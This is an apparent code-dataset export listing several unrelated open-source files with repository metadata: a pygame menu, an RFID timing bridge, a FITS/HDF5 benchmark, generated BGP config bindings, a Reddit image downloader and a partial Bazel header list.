hexsha
stringlengths 40
40
| size
int64 3
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
972
| max_stars_repo_name
stringlengths 6
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
972
| max_issues_repo_name
stringlengths 6
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
116k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
972
| max_forks_repo_name
stringlengths 6
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 3
1.03M
| avg_line_length
float64 1.13
941k
| max_line_length
int64 2
941k
| alphanum_fraction
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
22d131f503c48f738b5b4902e60813623504e67a
| 1,940
|
py
|
Python
|
Menus/Main/LevelSelectionEdit/DeleteLevel.py
|
PyRectangle/GreyRectangle
|
21c19002f52563a096566e9166040815005b830b
|
[
"MIT"
] | 3
|
2017-09-28T16:53:09.000Z
|
2018-03-18T20:01:41.000Z
|
Menus/Main/LevelSelectionEdit/DeleteLevel.py
|
PyRectangle/GreyRectangle
|
21c19002f52563a096566e9166040815005b830b
|
[
"MIT"
] | null | null | null |
Menus/Main/LevelSelectionEdit/DeleteLevel.py
|
PyRectangle/GreyRectangle
|
21c19002f52563a096566e9166040815005b830b
|
[
"MIT"
] | null | null | null |
from Frame.gui.Button import Button
from pygameImporter import pygame
from Frame.Render import Render
from Constants import *
from Menu import Menu
class DeleteLevel(Menu):
def __init__(self, menuHandler):
super().__init__()
self.level = None
self.alpha = 0
self.up = True
self.do = False
self.window = menuHandler.window
self.renderObj = Render(menuHandler.window)
self.addGui(Button, (menuHandler.edit, (), 40, 900, 400, 100, "Cancel", (100, 100, 100), (0, 0, 0), (100, 100, 255), (0, 0, 0), FONT, True, 30, 30, 0.1, True,
[0, -1], None, SOUNDS, menuHandler.window))
self.addGui(Button, (menuHandler.deleteLevel, (), 1000, 900, 400, 100, "Delete", (100, 100, 100), (0, 0, 0), (100, 100, 255), (0, 0, 0), FONT, True, 30, 30, 0.1,
True, [0, -1], None, SOUNDS, menuHandler.window))
def update(self):
super().update()
if self.do:
if self.up:
self.alpha += self.window.dt
if self.alpha > 255:
self.alpha = 255
self.do = False
else:
self.alpha -= self.window.dt
if self.alpha < 1:
self.do = False
self.alpha = 1
def render(self):
super().render()
text = "Do you really want to delete \"" + self.level.name + "\" ?"
self.renderObj.text(FONT, self.renderObj.getTextSizeForWidth(text, 100, SURFACE_SIZE[0], FONT), text, True, (0, 0, 0), None, self.window.surface, addY = -55,
alpha = self.alpha)
self.renderObj.text(FONT, 100, "It will be lost forever !", True, (0, 0, 0), None, self.window.surface, addY = 55, alpha = self.alpha)
self.renderObj.text(FONT, 100, "Delete", True, (0, 0, 0), None, self.window.surface, addY = -400, alpha = self.alpha)
| 45.116279
| 169
| 0.54433
|
e3c6f66ac9d8485c9fef648d232e2b315f862e9d
| 6,957
|
py
|
Python
|
CrossMgrImpinj/Impinj2JChip.py
|
esitarski/CrossMgr
|
de33b5ed662556ec659e6e2910f5fd0f88f25fa0
|
[
"MIT"
] | 25
|
2015-02-26T01:26:10.000Z
|
2022-03-25T15:46:55.000Z
|
CrossMgrImpinj/Impinj2JChip.py
|
esitarski/CrossMgr
|
de33b5ed662556ec659e6e2910f5fd0f88f25fa0
|
[
"MIT"
] | 76
|
2015-12-09T04:24:30.000Z
|
2022-02-18T16:39:28.000Z
|
CrossMgrImpinj/Impinj2JChip.py
|
esitarski/CrossMgr
|
de33b5ed662556ec659e6e2910f5fd0f88f25fa0
|
[
"MIT"
] | 17
|
2015-04-23T07:37:13.000Z
|
2020-01-22T17:47:16.000Z
|
import re
import os
import socket
import time
import threading
import datetime
from six.moves.queue import Empty
#------------------------------------------------------------------------------
# JChip delimiter (CR, **not** LF)
CR = u'\r'
#------------------------------------------------------------------------------
# Function to format number, lap and time in JChip format
# Z413A35 10:11:16.4433 10 10000 C7
count = 0
def formatMessage( tagID, t ):
global count
message = u"DA{} {} 10 {:05X} C7 date={}{}".format(
tagID, # Tag code in decimal, no leading zeros.
t.strftime('%H:%M:%S.%f'), # hh:mm:ss.ff
count, # Data index number in hex.
t.strftime('%Y%m%d'), # YYYYMMDD
CR
)
count += 1
return message
class Impinj2JChip:
def __init__( self, dataQ, messageQ, shutdownQ, crossMgrHost, crossMgrPort ):
''' Queues:
dataQ: tag/timestamp data to be written out to CrossMgr.
messageQ: queue to write status messages.
shutdownQ: queue to receive shutdown message to stop gracefully.
'''
self.dataQ = dataQ
self.messageQ = messageQ
self.shutdownQ = shutdownQ
self.crossMgrHost = crossMgrHost
self.crossMgrPort = crossMgrPort
self.keepGoing = True
self.tagCount = 0
def shutdown( self ):
self.keepGoing = False
def checkKeepGoing( self ):
if not self.keepGoing:
return False
try:
d = self.shutdownQ.get( False )
self.keepGoing = False
return False
except Empty:
return True
def getCmd( self, sock ):
received = ''
while self.keepGoing and received[-1:] != CR:
try:
received += sock.recv(4096).decode() # doing a decode() here only works if there are no multi-byte utf characters (which is true for JChip protocol).
except socket.timeout:
return received, True
return received[:-1], False
def runServer( self ):
instance_name = u'{}-{}'.format(socket.gethostname(), os.getpid())
while self.checkKeepGoing():
self.messageQ.put( ('Impinj2JChip', 'state', False) )
self.messageQ.put( ('Impinj2JChip', u'Trying to connect to CrossMgr at {}:{} as "{}"...'.format(self.crossMgrHost, self.crossMgrPort, instance_name)) )
sock = None
#------------------------------------------------------------------------------
# Connect to the CrossMgr server.
#
self.tagCount = 0
while self.checkKeepGoing():
try:
sock = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
sock.connect((self.crossMgrHost, self.crossMgrPort))
break
except socket.error:
sock = None
self.messageQ.put( ('Impinj2JChip', u'CrossMgr Connection Failed. Trying again at {}:{} as "{}" in 2 sec...'.format(self.crossMgrHost, self.crossMgrPort, instance_name)) )
for t in range(2):
time.sleep( 1 )
if not self.checkKeepGoing():
break
if not self.checkKeepGoing():
break
# Set the timeout with CrossMgr to 2 seconds. If CrossMgr fails to respond within this time, re-establish the connection.
sock.settimeout( 2.0 )
#------------------------------------------------------------------------------
# Send client identity.
#
self.messageQ.put( ('Impinj2JChip', u'state', True) )
self.messageQ.put( ('Impinj2JChip', u'******************************' ) )
self.messageQ.put( ('Impinj2JChip', u'CrossMgr Connection succeeded!' ) )
self.messageQ.put( ('Impinj2JChip', u'Sending identifier "{}"...'.format(instance_name)) )
try:
sock.send(u"N0000{}{}".format(instance_name, CR).encode())
except socket.timeout:
self.messageQ.put( ('Impinj2JChip', 'CrossMgr connection timed out [1].') )
sock.close()
sock = None
continue
#------------------------------------------------------------------------------
self.messageQ.put( ('Impinj2JChip', 'Waiting for GT (get time) command from CrossMgr...') )
received, timedOut = self.getCmd( sock )
if not self.checkKeepGoing():
break
if timedOut:
self.messageQ.put( ('Impinj2JChip', u'CrossMgr connection timed out [2].') )
sock.close()
sock = None
continue
self.messageQ.put( ('Impinj2JChip', u'Received: "{}" from CrossMgr'.format(received)) )
if received != 'GT':
self.messageQ.put( ('Impinj2JChip', u'Incorrect command (expected GT).') )
sock.close()
sock = None
continue
# Send 'GT' (GetTime response to CrossMgr).
self.messageQ.put( ('Impinj2JChip', u'Sending GT (get time) response...') )
# format is GT0HHMMSShh<CR> where hh is 100's of a second. The '0' (zero) after GT is the number of days running, ignored by CrossMgr.
dBase = datetime.datetime.now()
message = u'GT0{} date={}{}'.format(
dBase.strftime('%H%M%S%f'),
dBase.strftime('%Y%m%d'),
CR)
self.messageQ.put( ('Impinj2JChip', message[:-1]) )
try:
sock.send( message.encode() )
except socket.timeout:
self.messageQ.put( ('Impinj2JChip', u'CrossMgr connection timed out [3].') )
sock.close()
sock = None
continue
#------------------------------------------------------------------------------
if not self.checkKeepGoing():
break
self.messageQ.put( ('Impinj2JChip', u'Waiting for S0000 (send) command from CrossMgr...') )
received, timedOut = self.getCmd( sock )
if not self.checkKeepGoing():
break
if timedOut:
self.messageQ.put( ('Impinj2JChip', u'CrossMgr connection timed out [4].') )
sock.close()
sock = None
continue
self.messageQ.put( ('Impinj2JChip', u'Received: "{}" from CrossMgr'.format(received)) )
if not received.startswith('S'):
self.messageQ.put( ('Impinj2JChip', u'Incorrect command (expected S0000).') )
sock.close()
sock = None
continue
#------------------------------------------------------------------------------
# Enter "Send" mode - keep sending data until we get a shutdown.
# If the connection fails, return to the outer loop.
#
self.messageQ.put( ('Impinj2JChip', u'Start sending data to CrossMgr...') )
self.messageQ.put( ('Impinj2JChip', u'Waiting for RFID reader data...') )
while self.checkKeepGoing():
# Get all the entries from the receiver and forward them to CrossMgr.
d = self.dataQ.get()
if d == 'shutdown':
self.keepGoing = False
break
# Expect message if the form [tag, time].
message = formatMessage( d[0], d[1] )
try:
sock.send( message.encode() )
self.tagCount += 1
self.messageQ.put( ('Impinj2JChip', u'Forwarded {}: {}'.format(self.tagCount, message[:-1])) )
except Exception:
self.dataQ.put( d ) # Put the data back on the queue for resend.
self.messageQ.put( ('Impinj2JChip', u'Lost CrossMgr Connection. Attempting to reconnect...') )
break
sock.close()
sock = None
def CrossMgrServer( dataQ, messageQ, shutdownQ, crossMgrHost, crossMgrPort ):
impinj2JChip = Impinj2JChip( dataQ, messageQ, shutdownQ, crossMgrHost, crossMgrPort )
impinj2JChip.runServer()
| 35.314721
| 177
| 0.600834
|
814e131b935e732720cb4b9db0ae24fb45d2598d
| 3,672
|
py
|
Python
|
aadnc_benchmarks/benchmark_read_speed.py
|
telegraphic/fits2hdf
|
a5d66d104fdc70d67c2dac8103b70e5fe3bb9a01
|
[
"MIT"
] | 22
|
2015-03-02T21:38:33.000Z
|
2021-05-09T11:30:41.000Z
|
aadnc_benchmarks/benchmark_read_speed.py
|
telegraphic/fits2hdf
|
a5d66d104fdc70d67c2dac8103b70e5fe3bb9a01
|
[
"MIT"
] | 16
|
2015-03-01T23:11:49.000Z
|
2019-08-08T03:18:30.000Z
|
aadnc_benchmarks/benchmark_read_speed.py
|
telegraphic/fits2hdf
|
a5d66d104fdc70d67c2dac8103b70e5fe3bb9a01
|
[
"MIT"
] | 11
|
2015-03-26T14:50:33.000Z
|
2021-12-11T13:21:12.000Z
|
"""
benchmark compression
---------------------
Generate benchmarks for AANDC paper.
"""
import numpy as np
from os.path import join,exists
from shutil import copy2
import os
from fits2hdf import idi
from fits2hdf.io import hdfio, fitsio
import time
import h5py
from astropy.io import fits as pf
def create_image(img_name, data, hdf_opts={}):
""" Create HDF and FITS versions of a given image """
output_dir_fits = 'fits_generated'
output_dir_hdf = 'hdf_generated'
idi_img = idi.IdiHdulist()
idi_img.add_image_hdu(img_name, data=data)
# Create all the filenames
fits_filename = join(output_dir_fits, img_name+'.fits')
hdf_filename = join(output_dir_hdf, img_name+'.h5')
hdf_comp_filename = join(output_dir_hdf, img_name+'_comp.h5')
gzip_comp_filename = join(output_dir_fits, img_name+'.fits.gz')
fits_comp_filename = join(output_dir_fits, img_name+'.fits.fz')
# Delete files that already exists
file_list = [fits_filename, hdf_filename, fits_comp_filename,
hdf_comp_filename, gzip_comp_filename]
for fname in file_list:
if exists(fname):
os.remove(fname)
print("\nWriting %s to disk" % img_name)
t1 = time.time()
fitsio.export_fits(idi_img, fits_filename)
t2 = time.time()
hdfio.export_hdf(idi_img, hdf_filename)
t3 = time.time()
hdfio.export_hdf(idi_img, hdf_comp_filename, **hdf_opts)
t4 = time.time()
def read_speed(img_name):
output_dir_fits = 'fits_generated'
output_dir_hdf = 'hdf_generated'
fits_filename = join(output_dir_fits, img_name+'.fits')
hdf_filename = join(output_dir_hdf, img_name+'.h5')
hdf_comp_filename = join(output_dir_hdf, img_name+'_comp.h5')
with pf.open(fits_filename) as a:
print("DATA SHAPE: {}".format(a[0].data.shape))
t1 = time.time()
for ii in range(a[0].data.shape[0]):
d = a[0].data[ii::4, ii::4, ...]
t2 = time.time()
print(("Time for FITS access: %2.2es" % (t2 - t1)))
#%%
with h5py.File(hdf_filename,'r',libver='latest') as b:
k = b["random_integers_23"]["DATA"]
t1 = time.time()
for ii in range(d.shape[0]):
d = k[ii::4, ii::4, ...]
t2 = time.time()
print(("Time for HDF access: %2.2es" % (t2 - t1)))
if __name__== "__main__":
# IMAGE DATA
hdf_opts = {
'compression': 'bitshuffle'
}
print("HDF5 compression options:")
for option, optval in hdf_opts.items():
print((" ", option, optval))
#file_info = create_image(img_name, img_data, hdf_opts=hdf_opts)
# Generate data with differing levels of entropy
print("Generating random integers")
max_int = 2**23
#img_data = np.random.random_integers(-1*max_int, max_int, size=(1000, 1000, 1000)).astype('int32')
#create_image(img_name, img_data, hdf_opts=hdf_opts)
# Open example datasets
print("Reading...")
for copy_num in range(1, 5):
fname = "random_integers_%i.fits" % np.log2(max_int)
fname2 = "random_integers_%i%i.fits" % (np.log2(max_int), copy_num)
print(("cp fits_generated/%s fits_generated/%s" % (fname, fname2)))
copy2(join('fits_generated',fname), join('fits_generated/',fname2))
fname = "random_integers_%i.h5" % np.log2(max_int)
fname2 = "random_integers_%i%i.h5" % (np.log2(max_int), copy_num)
print(("cp hdf_generated/%s hdf_generated/%s" % (fname, fname2)))
copy2(join('hdf_generated',fname), join('hdf_generated/',fname2))
for copy_num in range(1, 5):
img_name = "random_integers_%i%i" % (np.log2(max_int), copy_num)
read_speed(img_name)
| 31.384615
| 103
| 0.64951
|
0079fa08a7707f5ec47be57cfb217679ee2a6b8b
| 6,158
|
py
|
Python
|
pybind/nos/v7_1_0/rbridge_id/router/router_bgp/router_bgp_attributes/neighbor/neighbor_ipv6s/neighbor_ipv6_addr/af_neighbor_capability/__init__.py
|
shivharis/pybind
|
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
|
[
"Apache-2.0"
] | null | null | null |
pybind/nos/v7_1_0/rbridge_id/router/router_bgp/router_bgp_attributes/neighbor/neighbor_ipv6s/neighbor_ipv6_addr/af_neighbor_capability/__init__.py
|
shivharis/pybind
|
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
|
[
"Apache-2.0"
] | null | null | null |
pybind/nos/v7_1_0/rbridge_id/router/router_bgp/router_bgp_attributes/neighbor/neighbor_ipv6s/neighbor_ipv6_addr/af_neighbor_capability/__init__.py
|
shivharis/pybind
|
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
|
[
"Apache-2.0"
] | 1
|
2021-11-05T22:15:42.000Z
|
2021-11-05T22:15:42.000Z
|
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import as4
class af_neighbor_capability(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-rbridge - based on the path /rbridge-id/router/router-bgp/router-bgp-attributes/neighbor/neighbor-ipv6s/neighbor-ipv6-addr/af-neighbor-capability. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__as4',)
_yang_name = 'af-neighbor-capability'
_rest_name = 'capability'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__as4 = YANGDynClass(base=as4.as4, is_container='container', presence=False, yang_name="as4", rest_name="as4", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set AS4 capability', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'rbridge-id', u'router', u'router-bgp', u'router-bgp-attributes', u'neighbor', u'neighbor-ipv6s', u'neighbor-ipv6-addr', u'af-neighbor-capability']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'rbridge-id', u'router', u'bgp', u'neighbor', u'neighbor-ipv6-addr', u'capability']
def _get_as4(self):
"""
Getter method for as4, mapped from YANG variable /rbridge_id/router/router_bgp/router_bgp_attributes/neighbor/neighbor_ipv6s/neighbor_ipv6_addr/af_neighbor_capability/as4 (container)
"""
return self.__as4
def _set_as4(self, v, load=False):
"""
Setter method for as4, mapped from YANG variable /rbridge_id/router/router_bgp/router_bgp_attributes/neighbor/neighbor_ipv6s/neighbor_ipv6_addr/af_neighbor_capability/as4 (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_as4 is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_as4() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=as4.as4, is_container='container', presence=False, yang_name="as4", rest_name="as4", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set AS4 capability', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """as4 must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=as4.as4, is_container='container', presence=False, yang_name="as4", rest_name="as4", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set AS4 capability', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__as4 = t
if hasattr(self, '_set'):
self._set()
def _unset_as4(self):
self.__as4 = YANGDynClass(base=as4.as4, is_container='container', presence=False, yang_name="as4", rest_name="as4", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set AS4 capability', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
as4 = __builtin__.property(_get_as4, _set_as4)
_pyangbind_elements = {'as4': as4, }
| 49.66129
| 472
| 0.714518
|
8faefcf16dad2d9986f2deef07951bb6489a9770
| 10,897
|
py
|
Python
|
ruidl.py
|
calebglawson/ruidl
|
c255e4aff80f36a21ea6df4851544069e3ee54d7
|
[
"MIT"
] | null | null | null |
ruidl.py
|
calebglawson/ruidl
|
c255e4aff80f36a21ea6df4851544069e3ee54d7
|
[
"MIT"
] | 1
|
2021-08-07T12:26:00.000Z
|
2021-08-07T12:26:00.000Z
|
ruidl.py
|
calebglawson/ruidl
|
c255e4aff80f36a21ea6df4851544069e3ee54d7
|
[
"MIT"
] | null | null | null |
'''
This file contains the necessary components to download images from a subbreddit or redditor.
'''
from abc import abstractmethod
import os
import re
import json
import hashlib
import sys
import time
import traceback
from glob import glob
from pathlib import Path
from multiprocessing import cpu_count
from multiprocessing.pool import ThreadPool
import exif
import requests
import praw
import prawcore
import typer
import wordninja
from bs4 import BeautifulSoup
APP = typer.Typer()
USER_AGENT_HEADER = {
'User-Agent': (
'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0'
)
}
def _make_config():
'''
Load the config from a file.
'''
config = open('./config.json')
return json.load(config)
def _make_api(config):
'''
Make a PRAW api object.
'''
api = praw.Reddit(
client_id=config.get('client_id'),
client_secret=config.get('client_secret'),
user_agent='script:com.example.ruidl:v1 (by u/anon)',
username=config.get('username'),
password=config.get('password')
)
return api
def _ninjify(url):
words = wordninja.split(url.split("/")[-1])
capitalized_words = ''
for idx, word in enumerate(words):
if idx < 3:
capitalized_words = f'{capitalized_words}{word[0].upper()}{word[1:]}'
else:
capitalized_words = f'{capitalized_words}{word}'
return capitalized_words
class Ruidl(object):
'''
Reddit media downloader.
'''
def __init__(self, name, download_directory, verbose):
self._name = name
self._verbose = verbose
self._type = getattr(self, '_type')
self._config = _make_config()
self._api = _make_api(self._config)
dl_dir = f'{download_directory}/' if download_directory else self._config.get(
"download_dir", "./"
)
self._base_path = f'{dl_dir}{self._type}{self._name.replace("_", "-")}'
if not os.path.exists(self._base_path):
os.makedirs(self._base_path)
self._filetypes = [
'.jpg',
'.png',
'.gif',
'.mp4',
'.webm'
]
self._invalid_filetypes = [
'.gifv'
]
existing_files = []
for file_type in self._filetypes:
existing_files.extend(glob(f'{self._base_path}/*{file_type}'))
self._filenames = {fn.split('_')[1] for fn in existing_files}
self._checksums = {
fn.split('_')[0].replace(f'{self._base_path}\\', '') for fn in existing_files
}
del existing_files
wordninja.DEFAULT_LANGUAGE_MODEL = wordninja.LanguageModel(
Path('./wordninja_words.txt.gz')
)
def _download_file(self, file_url, submission):
file_name = f'{self._base_path}/{file_url.split("/")[-1]}'
if file_name in self._filenames:
return
request = requests.get(file_url, headers=USER_AGENT_HEADER)
file_hash = hashlib.md5(request.content).hexdigest()
if file_hash in self._checksums:
return
self._checksums.add(file_hash)
self._filenames.add(file_name.split("/")[-1].split("?")[0])
new_file_name = f'{self._base_path}/{file_hash}_{file_name.split("/")[-1].split("?")[0]}'
if sys.getsizeof(request.content) < self._config.get('file_size_threshold', 10000):
return
with open(new_file_name, 'wb') as new:
new.write(request.content)
if any([file_type in file_name for file_type in ['mp4', 'gif', 'png', 'webm']]):
return
try:
with open(new_file_name, 'rb') as new:
image = exif.Image(new.read())
image.artist = str(submission.author)
image.image_description = str(submission.subreddit)
with open(new_file_name, 'wb') as new:
new.write(image.get_file())
except Exception as exception: # pylint: disable=broad-except
if self._verbose:
typer.echo(
f'Error writing Exif data: {new_file_name} {exception}'
)
def _get_file_urls(self, submission):
file_urls = []
if any([ext in submission.url for ext in self._filetypes]):
file_urls = [submission.url]
elif 'reddit.com/gallery' in submission.url:
request = requests.get(
submission.url,
headers=USER_AGENT_HEADER
)
soup = BeautifulSoup(request.content, features='html.parser')
file_urls = [
elem.get('href')
for elem in
soup.find_all(
'a',
href=re.compile('preview.redd.it'),
attrs={'target': '_blank'}
)
]
elif 'imgur.com/a/' in submission.url:
# Imgur gallery, multiple images.
gallery = submission.url.split("/")[-1]
request = requests.get(
f'https://imgur.com/ajaxalbums/getimages/{gallery}',
headers=USER_AGENT_HEADER
)
response = json.loads(request.content)
file_urls = [
f'https://i.imgur.com/{image["hash"]}{image["ext"]}'
for image in
response['data']['images']
# Exclude gifv
if image["ext"] not in self._invalid_filetypes
]
elif 'imgur.com/' in submission.url:
# Single imgur image.
image = submission.url.split("/")[-1]
file_urls = [f'https://i.imgur.com/{image}.jpg']
elif (
self._config.get('wordninja_trigger') and
self._config.get('wordninja_trigger') in submission.url
):
file_urls = [
(
f'{self._config.get("wordninja_download_url","")}'
f'{_ninjify(submission.url)}.mp4'
)
]
elif 'gfycat.com/' in submission.url:
file_urls = [
f'https://giant.gfycat.com/{_ninjify(submission.url)}.webm'
]
else:
if self._verbose:
typer.echo(
f'No match triggered for this URL: {submission.url} '
f'Permalink: https://reddit.com{submission.permalink}'
)
return file_urls
def _process_submission(self, submission):
try:
file_urls = self._get_file_urls(submission)
for file_url in file_urls:
self._download_file(file_url, submission)
except Exception as exception: # pylint: disable=broad-except
# Needed so that any exceptions in threads are loud and clear.
if self._verbose:
typer.echo(exception)
typer.echo(traceback.format_exc())
def _handle_submissions(self, submissions):
num_threads = cpu_count() if len(submissions) > cpu_count() else len(submissions)
if num_threads:
if any(character in self._name for character in ['-', '_']):
# We only place crumbs when they're needed.
Path(f'{self._base_path}/{self._name}.crumb').touch()
typer.echo(
f'Processing {len(submissions)} submissions with {num_threads} worker thread(s).'
)
thread_pool = ThreadPool(num_threads)
start_file_num = len(os.listdir(self._base_path))
start = time.time()
thread_pool.map_async(self._process_submission, submissions)
thread_pool.close()
thread_pool.join()
end = time.time()
end_file_num = len(os.listdir(self._base_path))
typer.echo(
f'Downloaded {end_file_num - start_file_num} '
f'files within {int(end - start)} seconds.'
)
else:
typer.echo('No submissions found, nothing to process.')
self._clean_empty_dir()
def _clean_empty_dir(self):
if len(os.listdir(self._base_path)) == 0:
os.rmdir(self._base_path)
@abstractmethod
def get(self, limit, search):
'''
Process the request to Reddit.
'''
raise NotImplementedError
class Redditor(Ruidl):
'''
A Redditor is a Reddit User.
'''
def __init__(self, name, download_directory, verbose):
self._type = 'redditor/'
super().__init__(name, download_directory, verbose)
def get(self, limit, search):
'''
Download content
'''
try:
redd = self._api.redditor(self._name)
typer.echo('Retrieving submission list.')
submissions = [
submission for submission in redd.submissions.new(limit=limit)
]
self._handle_submissions(submissions)
except prawcore.exceptions.NotFound:
typer.echo(f'Could not find redditor {self._name}.')
self._clean_empty_dir()
class Subreddit(Ruidl):
'''
A Subreddit is a community page on Reddit.
'''
def __init__(self, name, download_directory, verbose):
self._type = 'subreddit/'
super().__init__(name, download_directory, verbose)
def get(self, limit, search):
'''
Download content
'''
try:
sub = self._api.subreddit(self._name)
typer.echo('Retrieving submission list.')
submissions = [
submission for submission in
(
sub.search(
search,
sort='new',
limit=limit
) if search else sub.new(
limit=limit
)
)
]
self._handle_submissions(submissions)
except prawcore.exceptions.Redirect:
typer.echo(f'Could not find subreddit {self._name}.')
self._clean_empty_dir()
@APP.command()
def redditor(
name: str,
limit: int = typer.Option(None),
download_directory: str = typer.Option(None),
verbose: bool = typer.Option(False),
):
'''
Download from the specified user.
'''
Redditor(name, download_directory, verbose).get(limit, search=None)
@APP.command()
def subreddit(
name: str,
limit: int = typer.Option(None),
search: str = typer.Option(None),
download_directory: str = typer.Option(None),
verbose: bool = typer.Option(False),
):
'''
Download from the specified subreddit.
'''
Subreddit(name, download_directory, verbose).get(limit, search)
if __name__ == '__main__':
APP()
| 30.269444
| 97
| 0.559053
|
a08f64cd508c405efdf4cbebe1afbd3d8c64b7a1
| 3,323
|
bzl
|
Python
|
google/cloud/google_cloud_cpp_common.bzl
|
shaffeeullah/google-cloud-cpp
|
07396e652e8d738fd51ddd0bbeb04b4ab02ca267
|
[
"Apache-2.0"
] | null | null | null |
google/cloud/google_cloud_cpp_common.bzl
|
shaffeeullah/google-cloud-cpp
|
07396e652e8d738fd51ddd0bbeb04b4ab02ca267
|
[
"Apache-2.0"
] | null | null | null |
google/cloud/google_cloud_cpp_common.bzl
|
shaffeeullah/google-cloud-cpp
|
07396e652e8d738fd51ddd0bbeb04b4ab02ca267
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# DO NOT EDIT -- GENERATED BY CMake -- Change the CMakeLists.txt file if needed
"""Automatically generated source lists for google_cloud_cpp_common - DO NOT EDIT."""
google_cloud_cpp_common_hdrs = [
"backoff_policy.h",
"common_options.h",
"credentials.h",
"future.h",
"future_generic.h",
"future_void.h",
"iam_binding.h",
"iam_bindings.h",
"iam_policy.h",
"internal/absl_str_cat_quiet.h",
"internal/absl_str_join_quiet.h",
"internal/absl_str_replace_quiet.h",
"internal/algorithm.h",
"internal/api_client_header.h",
"internal/attributes.h",
"internal/backoff_policy.h",
"internal/base64_transforms.h",
"internal/big_endian.h",
"internal/build_info.h",
"internal/compiler_info.h",
"internal/credentials_impl.h",
"internal/diagnostics_pop.inc",
"internal/diagnostics_push.inc",
"internal/disable_deprecation_warnings.inc",
"internal/disable_msvc_crt_secure_warnings.inc",
"internal/filesystem.h",
"internal/format_time_point.h",
"internal/future_base.h",
"internal/future_fwd.h",
"internal/future_impl.h",
